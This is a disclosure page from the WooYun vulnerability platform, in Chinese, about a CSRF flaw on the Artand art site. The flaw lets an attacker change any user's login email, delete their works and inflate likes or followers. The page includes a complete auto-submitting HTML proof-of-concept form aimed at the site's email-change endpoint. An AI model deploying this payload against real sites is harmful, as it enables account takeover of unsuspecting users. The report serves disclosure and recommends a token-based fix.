当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092474

漏洞标题:Artand CSRF可重置任意用户登录邮箱

相关厂商:Artand艺术

漏洞作者: Kieran

提交时间:2015-01-19 17:20

修复时间:2015-03-05 17:22

公开时间:2015-03-05 17:22

漏洞类型:CSRF

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Artand CSRF可重置任意用户登录邮箱

详细说明:

Artand CSRF可重置任意用户登录邮箱,删除任意用户作品,点赞,涨粉。。

漏洞证明:

登陆后设置处点击 更换邮箱
输入验证密码后进入更换邮箱界面
然后发现验证密码后 点击确认 仅仅是个跳转页面的操作。。没有加任何验证。。那你这个验证密码有何作用= =不验证密码直接访问更改密码的url就可以直接改了!
更改密码 CSRF POC:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRSFTester</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "52" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);
}
function fireForms()
{
var count = 1;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();

pausecomp(pauses[i]);
}
}

</script>
<H2>CRSFTester</H2>
<form method="POST" name="form0" action="http://artand.cn:80/setting/send_check_email">
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="type" value="3"/>
</form>
</body>
</html>


只弄了个改登陆邮箱的 POC
另外还可以直接删除某用户的作品,让别人给自己点赞,自动成为自己的粉丝等

修复方案:

验证token什么的

版权声明:转载请注明来源 Kieran@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝